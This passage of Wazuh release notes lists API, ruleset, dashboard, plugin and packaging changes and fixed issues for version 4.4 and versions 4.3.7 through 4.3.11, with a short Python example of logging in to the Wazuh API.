  • #15084 Added distinct and select parameters to GET /sca/{agent_id} and GET /sca/{agent_id}/checks/{policy_id} endpoints.

  • #15290 Added new endpoint to run vulnerability detector on-demand scans (PUT /vulnerability).

  • #11341 Improved the GET /cluster/healthcheck endpoint and the cluster_control -i more CLI call in loaded cluster environments.

  • #12551 Changed API version and upgrade_version filters to work with different version formats.

  • #9413 Renamed GET /agents/{agent_id}/group/is_sync endpoint to GET /agents/group/is_sync and added new agents_list parameter.

  • #10397 Added the POST /security/user/authenticate endpoint and marked the GET /security/user/authenticate endpoint as deprecated (see the usage sketch after this list).

  • #12526 Adapted framework code to agent-group changes to use the new wazuh-db commands.

  • #13791 Updated default timeout for GET /mitre/software to avoid timing out in slow environments after the MITRE DB update to v11.2.

  • #14119 Changed API settings related to remote commands. The remote_commands section will be held within upload_wazuh_configuration.

  • #14233 Improved API unauthorized responses to be more accurate.

  • #14259 Updated framework functions that communicate with the request socket to use remote instead.

  • #14766 Improved parameter validation for API endpoints that require component and configuration parameters.

  • #15017 Improved GET /sca/{agent_id}/checks/{policy_id} API endpoint performance.

  • #15334 Improved exception handling when connecting to Wazuh sockets.

  • #15671 Modified _group_names and _group_names_or_all regexes to avoid invalid group names.

  • #15747 Changed GET /sca/{agent_id}/checks/{policy_id} endpoint filters and response to remove the status field.

  • #12595 Removed never_connected agent status limitation when assigning agents to groups.

  • #12053 Removed null remediations from failed API responses.

  • #12365 GET /agents/{agent_id}/group/is_sync endpoint is deprecated.
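
Several of the API additions above introduce new endpoints. As a usage illustration, the Python sketch below logs in through the new POST /security/user/authenticate endpoint and then queries GET /manager/daemons/stats. The host, port, credentials, and the assumption that the token is returned under data.token reflect common Wazuh API defaults and may differ in your deployment; verify=False is only appropriate for a self-signed test certificate.

    import requests

    API = "https://localhost:55000"   # assumed default API address
    AUTH = ("wazuh", "wazuh")         # assumed test credentials

    # Log in through the POST endpoint added in this release (#10397).
    response = requests.post(f"{API}/security/user/authenticate",
                             auth=AUTH, verify=False)
    token = response.json()["data"]["token"]  # assumed response layout

    # Query the new daemon statistics endpoint (#14401).
    headers = {"Authorization": f"Bearer {token}"}
    stats = requests.get(f"{API}/manager/daemons/stats",
                         headers=headers, verify=False)
    print(stats.json())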

Ruleset
  • #13594 Added support for new sysmon events.

  • #13595 Added new detection rules using Sysmon ID 1 events.

  • #13596 Added new detection rules using Sysmon ID 3 events.

  • #13630 Added new detection rules using Sysmon ID 7 events.

  • #13637 Added new detection rules using Sysmon ID 8 events.

  • #13639 Added new detection rules using Sysmon ID 10 events.

  • #13631 Added new detection rules using Sysmon ID 11 events.

  • #13636 Added new detection rules using Sysmon ID 13 events.

  • #13673 Added new detection rules using Sysmon ID 20 events.

  • #13638 Added new PowerShell ScriptBlock detection rules.

  • #15157 Added HPUX 11i SCA policies using bastille and without bastille.

  • #15072 Updated ruleset according to new API log changes when the user is logged in with authorization context.

  • #13579 Updated 0580-win-security_rules.xml rules.

  • #13622 Updated Wazuh MITRE ATT&CK database to version 11.3.

  • #13633 Updated detection rules in 0840-win_event_channel.xml.

  • #15070 SCA policy for Ubuntu Linux 20.04 rework.

  • #15051 Updated Ubuntu Linux 22.04 SCA Policy with CIS Ubuntu Linux 22.04 LTS Benchmark v1.0.0.

Other
  • #12733 Added unit tests to the component in Analysisd that extracts the IP address from events.

  • #12518 Added python-json-logger dependency.

  • #10773 The Ruleset test suite is prevented from restarting the manager.

  • #14839 The pthread's rwlock was replaced with a FIFO-queueing read-write lock.

  • #15809 Updated Python dependency certifi to 2022.12.7.

  • #15896 Updated Python dependency future to 0.18.3.

  • #16317 Updated Werkzeug to 2.2.3.

  • #16317 Updated Flask to 2.0.0.

  • #16317 Updated itsdangerous to 2.0.0.

  • #16317 Updated Jinja2 to 3.0.0.

  • #16317 Updated MarkupSafe to 2.1.2.

Wazuh dashboard
  • #4323 Added the option to sort by the agents count in the group table.

  • #3874 #5143 #5177 Added agent synchronization status in the agent module.

  • #4739 Added an agent name input so that, when the user provides a value, the WAZUH_AGENT_NAME variable with that value appears in the installation command.

  • #4512 Redesigned the SCA table in the agent's dashboard.

  • #4501 The plugin setting descriptions displayed in the UI and in the configuration file are enhanced.

  • #4503 #4785 Added validation to the plugin settings in the Settings/Configuration form and to the endpoint that updates the plugin configuration.

  • #4505 #4798 #4805 Added new plugin settings to customize the header and footer on the PDF reports.

  • #4507 Added a new plugin setting to enable or disable the customization.

  • #4504 Added the ability to upload an image for the customization.logo.* settings in Settings/Configuration.

  • #4867 Added the macOS version to the deploy agent wizard.

  • #4833 Added the PowerPC architecture for Red Hat 7 in the Deploy new agent section.

  • #4831 Added a centralized service to handle the requests.

  • #4873 Added data-test-subj create policy.

  • #4933 Added an extra steps message and a new command for Windows XP and Windows Server 2008, and added the Alpine agent with all its steps.

  • #4933 Deploy new agent section: Added link for additional steps to Alpine OS.

  • #4970 Added file saving conditions in File Editor.

  • #5021 #5028 Added character validation to avoid invalid agent names in the section Deploy new agent.

  • #5063 Added default selected options in Deploy Agent page.

  • #5166 Added the server address and Wazuh protocol definition in the Deploy new agent section.

  • #4103 Changed the HTTP verb from GET to POST in the requests to login to the Wazuh API.

  • #4376 #5071 #5131 Improved alerts summary performance.

  • #4363 #5076 Improved Agents Overview performance.

  • #4529 #4964 Improved the message displayed when there is a version mismatch between the Wazuh API and the Wazuh app.

  • #4363 Independently load each dashboard from the Agents Overview page.

  • #3874 The endpoint /agents/summary/status response was adapted.

  • #4458 Updated and added operating systems, versions, architectures, and commands for Install and enroll the agent and Start the agent in the Deploy new agent section.

  • #4776 #4954 Added cluster's IP and protocol as suggestions in the agent deployment wizard.

  • #4851 Show the OS name and OS version in the agent installation wizard.

  • #4501 Changed the endpoint that updates the plugin configuration to support multiple settings.

  • #4985 Updated the winston dependency to 3.5.1.

  • #4985 Updated the pdfmake dependency to 0.2.6.

  • #4992 The button to export the app logs is now disabled when there are no results instead of showing an error toast.

  • #5031 Unify the SCA check result label name.

  • #5062 Updated mocha dependency to 10.1.0.

  • #5062 Updated pdfmake dependency to 0.2.7.

  • #4491 Removed custom styles from Kibana 7.9.0.

  • #4985 Removed the angular-chart.js dependency.

  • #5062 #5089 Removed the pug-loader dependency.

Wazuh Kibana plugin for Kibana 7.10.2
  • #4323 Added the option to sort by the agents count in the group table.

  • #3874 #5143 #5177 Added agent synchronization status in the agent module.

  • #4739 Added the ability to set the name of the agent using the deployment wizard.

  • #4739 The input name was added so that when the user adds a value, the variable WAZUH_AGENT_NAME with its value appears in the installation command.

  • #4512 Redesign the SCA table from the agent's dashboard.

  • #4501 The plugin setting description displayed in the UI, and the configuration file are enhanced.

  • #4503 #4785 Added validation to the plugin settings in the form of Settings/Configuration and the endpoint to update the plugin configuration.

  • #4505 #4798 #4805 Added new plugin settings to customize the header and footer on the PDF reports.

  • #4507 Added a new plugin setting to enable or disable the customization.

  • #4504 Added the ability to upload an image for the customization.logo.* settings in Settings/Configuration.

  • #4867 Added macOS version to wizard deploy agent.

  • #4833 Added PowerPC architecture in Red Hat 7, in the section Deploy new agent.

  • #4831 Added a centralized service to handle the requests.

  • #4873 Added data-test-subj create policy.

  • #4933 Added an extra steps message and a new command for Windows XP and Windows Server 2008, and added the Alpine agent with all its steps.

  • #4933 Deploy new agent section: Added link for additional steps to Alpine OS.

  • #4970 Added file saving conditions in File Editor.

  • #5021 #5028 Added character validation to avoid invalid agent names in the section Deploy new agent.

  • #5063 Added default selected options in Deploy Agent page.

  • #5166 Added the server address and Wazuh protocol definition in the Deploy new agent section.

  • #4103 Changed the HTTP verb from GET to POST in the requests to login to the Wazuh API.

  • #4376 #5071 #5131 Improved alerts summary performance.

  • #4363 #5076 Improved Agents Overview performance.

  • #4529 #4964 Improved the message displayed when there is a version mismatch between the Wazuh API and the Wazuh app.

  • #4363 Independently load each dashboard from the Agents Overview page.

  • #3874 The endpoint /agents/summary/status response was adapted.

  • #4458 Updated and added operating systems, versions, architectures commands of Install and enroll the agent and commands of Start the agent in the deploy new agent section.

  • #4776 #4954 Added cluster's IP and protocol as suggestions in the agent deployment wizard.

  • #4851 Show the OS name and OS version in the agent installation wizard.

  • #4501 Changed the endpoint that updates the plugin configuration to support multiple settings.

  • #4985 Updated the winston dependency to 3.5.1.

  • #4992 The button to export the app logs is now disabled when there are no results, instead of showing an error toast.

  • #5062 Updated mocha dependency to 10.1.0.

  • #5031 Unify the SCA check result label name.

  • #5014 Removed the angular-chart.js dependency.

  • #5062 Removed the pug-loader dependency.

  • #5102 Removed unused file related to agent menu.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x
  • #4323 Added the option to sort by the agents count in the group table.

  • #3874 #5143 #5177 Added agent synchronization status in the agent module.

  • #4739 The input name was added so that when the user adds a value, the variable WAZUH_AGENT_NAME with its value appears in the installation command.

  • #4512 Redesign the SCA table from the agent's dashboard.

  • #4501 The plugin setting description displayed in the UI, and the configuration file are enhanced.

  • #4503 #4785 Added validation to the plugin settings in the form of Settings/Configuration and the endpoint to update the plugin configuration.

  • #4505 #4798 #4805 Added new plugin settings to customize the header and footer on the PDF reports.

  • #4507 Added a new plugin setting to enable or disable the customization.

  • #4504 Added the ability to upload an image for the customization.logo.* settings in Settings/Configuration.

  • #4867 Added macOS version to wizard deploy agent.

  • #4833 Added PowerPC architecture in Red Hat 7, in the section Deploy new agent.

  • #4831 Added a centralized service to handle the requests.

  • #4873 Added data-test-subj create policy.

  • #4933 Added an extra steps message and a new command for Windows XP and Windows Server 2008, and added the Alpine agent with all its steps.

  • #4933 Deploy new agent section: Added link for additional steps to Alpine OS.

  • #4970 Added file saving conditions in File Editor.

  • #5021 #5028 Added character validation to avoid invalid agent names in the section Deploy new agent.

  • #5063 Added default selected options in Deploy Agent page.

  • #5166 Added the server address and Wazuh protocol definition in the Deploy new agent section.

  • #4103 Changed the HTTP verb from GET to POST in the requests to login to the Wazuh API.

  • #4376 #5071 #5131 Improved alerts summary performance.

  • #4363 #5076 Improved Agents Overview performance.

  • #4529 #4964 Improved the message displayed when there is a version mismatch between the Wazuh API and the Wazuh app.

  • #4363 Independently load each dashboard from the Agents Overview page.

  • #3874 The endpoint /agents/summary/status response was adapted.

  • #4458 Updated and added operating systems, versions, architectures commands of Install and enroll the agent and commands of Start the agent in the deploy new agent section.

  • #4776 #4954 Added cluster's IP and protocol as suggestions in the agent deployment wizard.

  • #4851 Show the OS name and OS version in the agent installation wizard.

  • #4501 Changed the endpoint that updates the plugin configuration to support multiple settings.

  • #4972 The button to export the app logs is now disabled when there are no results instead of showing an error toast.

  • #4985 Updated the winston dependency to 3.5.1.

  • #4985 Updated the pdfmake dependency to 0.2.6.

  • #4992 The button to export the app logs is now disabled when there are no results instead of showing an error toast.

  • #5062 Updated mocha dependency to 10.1.0.

  • #5062 Updated pdfmake dependency to 0.2.7.

  • #5031 Unify the SCA check result label name.

  • #4985 Removed the angular-chart.js dependency.

  • #5062 Removed the pug-loader dependency.

  • #5103 Removed unused file related to agent menu.

Wazuh Splunk app
  • #1355 Added agent's synchronization statistics.

  • #1355 Updated the response handlers for the /agents/summary/status endpoint.

Packages
  • #1980 The Wazuh dashboard is now based on OpenSearch dashboards 2.4.1.

  • #1979 The Wazuh indexer is now based on OpenSearch 2.4.1.

  • #1715 Added the Alpine package build.

  • #1770 The wazuh-certs-tool.sh now supports multiple IP addresses for each node.

  • #1167 Added the Azure wodle files to the Solaris 11 and RPM agent SPEC files.

  • #1379 Added the new wodles/gcloud files and folders to the Solaris 11 SPEC file.

  • #1453 Added orm.py to the Solaris 11 SPEC file.

  • #1299 Applied the changes required for the new agent-group mechanism.

  • #1569 Removed unnecessary plugins from the default Wazuh dashboard.

  • #1602 Simplified the Splunk packages builder.

  • #1687 Installed open-vm-tools in the OVA.

  • #1699 Added a custom path option for the Wazuh indexer packages.

  • #1751 Updated the Wazuh dashboard loading screen.

  • #1823 The indexer-security-init.sh now accepts DNS names as network hosts.

  • #1154 The Wazuh passwords tool is now able to obtain the IP address of an interface from the configuration file.

  • #1839 The Wazuh installation assistant now uses apt-get instead of apt.

  • #1831 The base creation is now integrated within the build_packages.sh script.

  • #1838 Changed the internal directory in the base container.

  • #1473 Changed method from GET to POST in the API login requests.

  • #1882 Added changes to distribute the libstdc++ and libgcc_s libraries with the Wazuh packages.

  • #1890 Updated permissions in the Wazuh indexer and Wazuh dashboard.

  • #1876 Removed the deprecated apt-key utility from the Wazuh installation assistant.

  • #1904 Parameterized the Wazuh dashboard script.

  • #1929 Added the Wazuh dashboard light loading screen logo in dark mode.

  • #1930 Added the Distribution version matrix section in the wazuh-packages README.md file.

  • #1961 Added ossec.conf file generation and improved SPECs on the Alpine packages.

  • #1343 Signed the Windows dynamic link library files.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#10873

Fixed wazuh-dbd halt procedure.

#12098

Fixed compilation warnings in the manager.

#12516

Fixed a bug in the manager that did not send shared folders correctly to agents belonging to multiple groups.

#12834

Fixed the Active Response decoders to support back the top entries for source IP in reports.

#13338

Fixed the feed update interval option of Vulnerability Detector for the JSON Red Hat feed.

#12127

Fixed several code flaws in the Python framework.

#10635

Fixed code flaw regarding the use of XML package.

#10636

Fixed code flaw regarding permissions at group directories.

#10544

Fixed code flaw regarding temporary directory names.

#11951

Fixed code flaw regarding try, except and pass code block in wazuh-clusterd.

#10782

Fixed framework datetime transformations to UTC.

#11866

Fixed a cluster error when Master-Worker tasks were not properly stopped after an exception occurred in one or both parts.

#12831

Fixed cluster logger issue printing NoneType: None in error logs.

#13419

Fixed unhandled cluster error when reading a malformed configuration.

#13368

Fixed framework unit test failures when run by the root user.

#13405

Fixed a memory leak in analysisd when parsing a disabled Active Response.

#13892

wazuh-db is prevented from deleting queue/diff when cleaning databases.

#14981

Fixed multiple data race conditions in Remoted reported by ThreadSanitizer.

#15151

Fixed aarch64 OS collection in Remoted to allow WPK upgrades.

#15165

Fixed a race condition in Remoted that was blocking agent connections.

#13531

Fixed the VirusTotal integration to support non-UTF-8 characters.

#14922

Fixed a bug masking as Timeout any error that might occur while waiting to receive files in the cluster.

#15876

Fixed a read buffer overflow in wazuh-authd when parsing requests.

#16012

Applied workaround for bpo-46309 used in a cluster to wazuh-db communication.

#16233

Let the database module synchronize the agent group data before assignments.

#16321

Fixed memory leaks in wazuh-analysisd when parsing and matching rules.

Wazuh agent

Reference

Description

#7687

Fixed collection of maximum user data length.

#10772

Fixed missing fields in Syscollector on Windows 10.

#11227

Fixed the process startup time data provided by Syscollector on Linux.

#11837

Fixed network data reporting by Syscollector related to tunnel or VPN interfaces.

#12066

The V9FS file system is now skipped by Rootcheck to prevent false positives on WSL.

#9067

Fixed double file handle closing in Logcollector on Windows.

#11949

Fixed a bug in Syscollector that may prevent the agent from stopping when the manager connection is lost.

#12148

Fixed internal exception handling issues on Solaris 10.

#12300

Fixed duplicate error message IDs in the log.

#12691

Fixed compilation warnings in the agent.

#12147

Fixed the skip_on_error parameter of the AWS integration module, which was set to True by default.

#12381

Fixed AWS DB maintenance with Load Balancer Buckets.

#12650

Fixed AWS integration's test_config_format_created_date unit test.

#12630

Fixed created_date field for LB and Umbrella integrations.

#13185

Fixed AWS integration database maintenance error management.

#13674

The default delay at GitHub integration has been increased to 30 seconds.

#14706

Logcollector has been fixed to allow locations containing colons (:).

#13835

Fixed system architecture reporting in Syscollector on Apple Silicon devices.

#14190

The C++ standard library and the GCC runtime library are now included with Wazuh.

#13877

Fixed missing inventory cleaning message in Syscollector.

#15322

Fixed WPK upgrade issue on Windows agents due to process locking.

#13044

Fixed FIM injection vulnerability when using prefilter_cmd option.

#14525

Fixed the parsing of ALB logs by splitting client_port, target_port, and target_port_list into separate ip and port values for each key.

#15335

Fixed a bug that prevented processing Macie logs with problematic ipGeolocation values.

#15584

Fixed GCP integration module error messages.

#15575

Fixed an error that prevented the agent on Windows from stopping correctly.

#16140

Fixed Azure integration credentials link.

RESTful API

Reference

Description

#12302

Fixed copy functions used for the backup files and upload endpoints to prevent incorrect metadata.

#11010

Fixed a bug where IDs were not sorted in the Active Response and Agent endpoints when the cluster is disabled.

#10736

Fixed a bug where null values from wazuh-db were returned in API responses.

#12063

Connections through WazuhQueue will be closed gracefully in all situations.

#12450

Fixed exception handling when trying to get the active configuration of a valid but not configured component.

#12700

Fixed api.yaml path suggested as remediation at exception.py.

#12768

Fixed /tmp access error in containers of API integration tests environment.

#13096

The API will return an exception when the user asks for agent inventory information, and there is no database for it (never connected agents).

#13171 #13386

Improved regex used for the q parameter on API requests with special characters and brackets.

#12592

Removed board_serial from syscollector integration tests expected responses.

#12557

Removed cmd field from expected responses of syscollector integration tests.

#12611

Reduced the maximum number of groups per agent to 128 and adjusted group name validation.

#14204

Reduced amount of memory required to read CDB lists using the API.

#14237

Fixed a bug where the cluster health check endpoint and CLI would add an extra active agent to the master node.

#15311

Fixed bug that prevents updating the configuration when using various <ossec_conf> blocks from the API.

#15194

Fixed vulnerability API integration tests' healthcheck.

Ruleset

Reference

Description

#11613

Fixed the OpenWRT decoder to parse UFW logs.

#14807

Fixed a bug in the wazuh-api-fields decoder.

#13567

Fixed deprecated MITRE tags in rules.

#15241

Fixed an issue where SCA check IDs were not unique.

#14513

Fixed regex in check 5.1.1 of Ubuntu 20.04 SCA.

#15251

Removed wrong Fedora Linux SCA default policies.

#15156

Fixed duplicated check IDs 7521 and 7522 in the SUSE Linux Enterprise 15 SCA policy.

Other

Reference

Description

#14165

Fixed Makefile to detect CPU architecture on Gentoo Linux.

Wazuh dashboard

Reference

Description

#4425

Fixed nested fields filtering in dashboards tables and KPIs.

#4428

Fixed nested field rendering in security alerts table details.

#4539

Fixed a bug where the Wazuh logo was used instead of the custom one.

#4516

Fixed rendering problems of the Agent Overview section in low resolutions.

#4595

Fixed issue when logging out from Wazuh when SAML is enabled.

#4710 #4728 #4971

Fixed server errors with code 500 when the Wazuh API is not reachable / up.

#4653 #5010

Fixed pagination to SCA table.

#4849

Fixed WAZUH_PROTOCOL param suggestion.

#4876 #4880

Raspbian OS, Ubuntu, Amazon Linux, and Amazon Linux 2 commands now change when a different architecture is selected in the deploy agent wizard.

#4929

Disabled unmapped fields filter in Security Events alerts table.

#4933

Deploy new agent section: Fixed how macOS versions and architectures were displayed, fixed how agents were displayed, and fixed how Ubuntu versions were displayed.

#4943

Fixed agent deployment instructions for HP-UX and Solaris.

#4638 #5046

Fixed a bug that caused the flyouts to close when clicking inside them.

#4981

Fixed the manager option in the agent deployment section.

#4999 #5031

Fixed Inventory checks table filters by stats.

#4962

Fixed commands in the deploy new agent section (most of the commands were missing -1).

#4968

Fixed agent installation command for macOS in the deploy new agent section.

#4942

Fixed agent graph in OpenSearch dashboard.

#4984

Fixed commands in the deploy new agent section (most of the commands were missing -1).

#4975

Fixed default last scan date parser to be able to catch dates returned by Wazuh API when no vulnerabilities scan has been made.

#5035

A Solaris command has been fixed.

#5045

Fixed commands for AIX, openSUSE, Alpine, SUSE 11, Fedora, HP-UX, Oracle Linux 5, Amazon Linux 2, and CentOS 5. Changed the wording "or higher" in buttons to "+". Fixed validations for HP-UX, Solaris, and Alpine.

#5069

Fixed error in Github module PDF report.

#5098

Fixed password input in deploy new agent section.

#5094

Fixed error when clicking on the selectors of agents in the group agents management.

#5092

Fixed the menu content panel being displayed in the wrong place.

#5101

Fixed greyed and disabled menu section names.

#5107

Fixed misspelling in the NIST module.

#5150

Fixed Statistic cronjob bulk document insert.

#5137

Fixed the style of the buttons showing more event information in the event view table.

#5144

Fixed Inventory module for Solaris agents.

#5167

Fixed the module information button in Office365 and Github Panel tab to open the nav drawer.

#5200

Fixed a UI crash caused by the external_references field missing in some vulnerability data.

#5273

Fixed the Wazuh main menu not being displayed when the navigation menu is locked.

#5286

The event view is now working correctly after fixing a problem that occurred when Lucene language was selected in the search bar.

#5285 #5295

Fixed the incorrect use of the connection secure property by Deploy Agent.

#5291

Head rendering in the agent view has been corrected.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4425

Fixed nested fields filtering in dashboards tables and KPIs.

#4428

Fixed nested field rendering in security alerts table details.

#4539

Fixed a bug where the Wazuh logo was used instead of the custom one.

#4516

Fixed rendering problems of the Agent Overview section in low resolutions.

#4595

Fixed issue when logging out from Wazuh when SAML is enabled.

#4710 #4728 #4971

Fixed server errors with code 500 when the Wazuh API is not reachable / up.

#4653 #5010

Fixed pagination to SCA table.

#4849

Fixed WAZUH_PROTOCOL param suggestion.

#4876 #4880

Raspbian OS, Ubuntu, Amazon Linux, and Amazon Linux 2 commands now change when a different architecture is selected in the deploy agent wizard.

#4929

Disabled unmapped fields filter in Security Events alerts table.

#4981

Fixed the manager option in the agent deployment section.

#4999 #5031

Fixed Inventory checks table filters by stats.

#4962

Fixed commands in the deploy new agent section (most of the commands were missing -1).

#4968

Fixed agent installation command for macOS in the deploy new agent section.

#4933

Deploy new agent section: Fixed how macOS versions and architectures were displayed, fixed how agents were displayed, and fixed how Ubuntu versions were displayed.

#4943

Fixed agent deployment instructions for HP-UX and Solaris.

#4999

Fixed Inventory checks table filters by stats.

#4975

Fixed default last scan date parser to be able to catch dates returned by Wazuh API when no vulnerabilities scan has been made.

#5035

A Solaris command has been fixed.

#5045

Fixed commands for AIX, openSUSE, Alpine, SUSE 11, Fedora, HP-UX, Oracle Linux 5, Amazon Linux 2, and CentOS 5. Changed the wording "or higher" in buttons to "+". Fixed validations for HP-UX, Solaris, and Alpine.

#5069

Fixed error in Github module PDF report.

#5098

Fixed password input in deploy new agent section.

#5094

Fixed error when clicking on the selectors of agents in the group agents management.

#5107

Fixed misspelling in the NIST module.

#5150

Fixed Statistic cronjob bulk document insert.

#5137

Fixed the style of the buttons showing more event information in the event view table.

#5144

Fixed Inventory module for Solaris agents.

#5200

Fixed a UI crash caused by the external_references field missing in some vulnerability data.

#5285 #5295

Fixed the incorrect use of the connection secure property by Deploy Agent.

#5291

Head rendering in the agent view has been corrected.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4425

Fixed nested fields filtering in dashboards tables and KPIs.

#4428 #4925

Fixed nested field rendering in security alerts table details.

#4539

Fixed a bug where the Wazuh logo was used instead of the custom one.

#4516

Fixed rendering problems of the Agent Overview section in low resolutions.

#4595

Fixed issue when logging out from Wazuh when SAML is enabled.

#4710 #4728 #4971

Fixed server errors with code 500 when the Wazuh API is not reachable / up.

#4653 #5010

Fixed pagination to SCA table.

#4849

Fixed WAZUH_PROTOCOL param suggestion.

#4876 #4880

Raspbian OS, Ubuntu, Amazon Linux, and Amazon Linux 2 commands now change when a different architecture is selected in the deploy agent wizard.

#4929

Disabled unmapped fields filter in Security Events alerts table.

#4832 #4838

Fixed the agents wizard OS styles and their versions.

#4981

Fixed the manager option in the agent deployment section.

#4999 #5031

Fixed Inventory checks table filters by stats.

#4962

Fixed commands in the deploy new agent section (most of the commands were missing -1).

#4968

Fixed agent installation command for macOS in the deploy new agent section.

#4933

Deploy new agent section: Fixed how macOS versions and architectures were displayed, fixed how agents were displayed, and fixed how Ubuntu versions were displayed.

#4943

Fixed agent deployment instructions for HP-UX and Solaris.

#4999

Fixed Inventory checks table filters by stats.

#4983

Fixed agent installation command for macOS in the deploy new agent section.

#4975

Fixed default last scan date parser to be able to catch dates returned by Wazuh API when no vulnerabilities scan has been made.

#5035

A Solaris command has been fixed.

#5045

Fixed commands for AIX, openSUSE, Alpine, SUSE 11, Fedora, HP-UX, Oracle Linux 5, Amazon Linux 2, and CentOS 5. Changed the wording "or higher" in buttons to "+". Fixed validations for HP-UX, Solaris, and Alpine.

#5069

Fixed error in Github module PDF report.

#5098

Fixed password input in deploy new agent section.

#5094

Fixed error when clicking on the selectors of agents in the group agents management.

#5107

Fixed misspelling in the NIST module.

#5150

Fixed Statistic cronjob bulk document insert.

#5137

Fixed the style of the buttons showing more event information in the event view table.

#5144

Fixed Inventory module for Solaris agents.

#5200

Fixed a UI crash caused by the external_references field missing in some vulnerability data.

#5285 #5295

Fixed the incorrect use of the connection secure property by Deploy Agent.

#5291

Head rendering in the agent view has been corrected.

Packages

Reference

Description

#1091

Updated g++ to fix an undefined behavior on openSUSE Tumbleweed.

#976

Added the missing tar dependency in the Wazuh installation assistant.

#1196

Fixed the RPM wazuh-agent package build.

#1431

Fixed a compilation error on CentOS 5 and CentOS 7, as well as the building of the Docker images for CentOS 5 on the i386 architecture.

#1611

Fixed the Solaris 11 generation branch.

#1653

Fixed the log cleaning command in the OVA generation.

#1661

Fixed the invoke.rc call.

#1674

Fixed RHEL9 init.d file installation.

#1675

Fixed RHEL9 sysv-init error.

#1650

Fixed the package building for Arch Linux.

#1688

Updated the generate_ova.sh script.

#2019

Removed error logs from the OVA.

#1905

Fixed service enablement in SUSE packages.

#1877

Fixed package conflicts between the wazuh-manager and azure-cli on CentOS 8.

#1779

Fixed the Wazuh installation assistant all-in-one deployment on Fedora 36.

#1812

Fixed the RHEL and CentOS SCA template generation.

#1826

Fixed the wazuh-certs-tool.sh behavior when the given command does not match the content of the config.yml file.

#1824

Added daemon-reload at the end of the rollback function.

#1836

Fixed the Wazuh offline installation messages.

#1898

Removed Wazuh dashboard and Wazuh indexer init.d service for RHEL9.

#1925

Removed a black square icon from the Wazuh dashboard.

#1963

An issue that didn't allow the Wazuh installation assistant to create certificates for more than 9 nodes is now fixed.

#1987

Removed the init.d service for Wazuh dashboard RPM.

#1983

requestHeadersWhitelist is deprecated and has been replaced by requestHeadersAllowlist.

#1986

The Wazuh installation assistant now shows a message indicating that the Wazuh indexer was removed.

#2018

Disabled the expanded header by default in the Wazuh dashboard.

#1932

Added flag mechanism to configure the protection for untrusted libraries verification.

#1727

Added a fix to avoid GLIBC crash.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.11 Release notes - 24 April 2023

This section lists the changes in version 4.3.11. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#16752

Fixed a dead code bug that might cause wazuh-db to crash.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.10 Release notes - 16 November 2022

This section lists the changes in version 4.3.10. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#15219

The Arch Linux feed URL in Vulnerability Detector is updated.

#15197

A bug in Vulnerability Detector related to the internal database access is fixed.

#15303

A crash hazard in Analysisd when parsing an invalid <if_sid> value in the ruleset is now fixed.

Wazuh agent

Reference

Description

#15259

The agent upgrade configuration has been restricted to local settings.

#15262

An unwanted Windows agent configuration modification on upgrade is fixed.

Wazuh dashboard

Reference

Description

#4815

An issue with logging out from Wazuh when SAML is enabled is now fixed.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#4815

An issue with logging out from Wazuh when SAML is enabled is now fixed.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#4815

An issue with logging out from Wazuh when SAML is enabled is now fixed.

Packages

Reference

Description

#1901

Improved the config.yml template to prevent indentation issues.

#1910

Fixed the clean function in the WPK generation.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.9 Release notes - 13 October 2022

This section lists the changes in version 4.3.9. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements, such as the following:

Wazuh agent
  • #14497 An obsolete Windows Audit SCA policy file is removed.

Wazuh Kibana plugin
  • Support for Kibana 7.17.6.

Wazuh Splunk app
  • Support for Splunk 8.2.7.1 and 8.2.8.

Other
  • #15067 The external protobuf Python dependency is updated to 3.19.6.

Resolved issues

This release resolves known issues, such as the following:

Wazuh agent

Reference

Description

#15007

The remote policy detection in SCA is fixed.

#15023

Fixed the agent upgrade module settings parser. Now a default CA file is set.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.8 Release notes - 19 September 2022

This section lists the changes in version 4.3.8. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements, such as the following:

Wazuh agent
  • #14842 Updated the WPK upgrade root CA certificate.

Resolved issues

This release resolves known issues, such as the following:

Wazuh manager

Reference

Description

#14752

A wrong field assignation in Audit decoders is now fixed.

#14825

A performance problem when synchronizing files through the cluster is fixed. The multigroup folder in worker nodes is no longer cleaned upon node restart.

#14772

A problem when using an invalid syntax with the if_sid label is fixed. Now the rule is ignored if the listed if_sid rules are not separated by spaces or commas.

Wazuh agent

Reference

Description

#14801

A path traversal flaw in Active Response affecting agents from v3.6.1 to v4.3.7 is fixed. Thanks to Roshan Guragain for reporting this vulnerability.

Packages

Reference

Description

#1798

Improved error management and IP values extraction function in the wazuh-certs-tool.sh.

#1806

An error while changing the password in the Wazuh dashboard configuration using wazuh-install.sh is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.3.7 Release notes - 24 August 2022

This section lists the changes in version 4.3.7. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements, such as the following:

Wazuh manager
  • #14540 A cluster command to obtain custom ruleset files and their hash is added.

Wazuh agent
  • #13958 The logs of the Office365 integration module are improved.

RESTful API
  • #14551 The endpoint GET /cluster/ruleset/synchronization to check the status of the synchronization of the ruleset in a cluster is added.

  • #14208 The performance of framework functions for MITRE API endpoints is improved.

Ruleset
  • #13806 An SCA Policy for CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 is added.

  • #13879 The SCA Policy for CIS Microsoft Windows 10 Enterprise is updated with the benchmark v1.12.0 for the release 21H2.

  • #13843 An SCA policy for Red Hat Enterprise Linux 9 (RHEL9) is added.

  • #13899 An SCA policy for CIS Microsoft Windows Server 2022 Benchmark 1.0.0 is added.

Wazuh dashboard
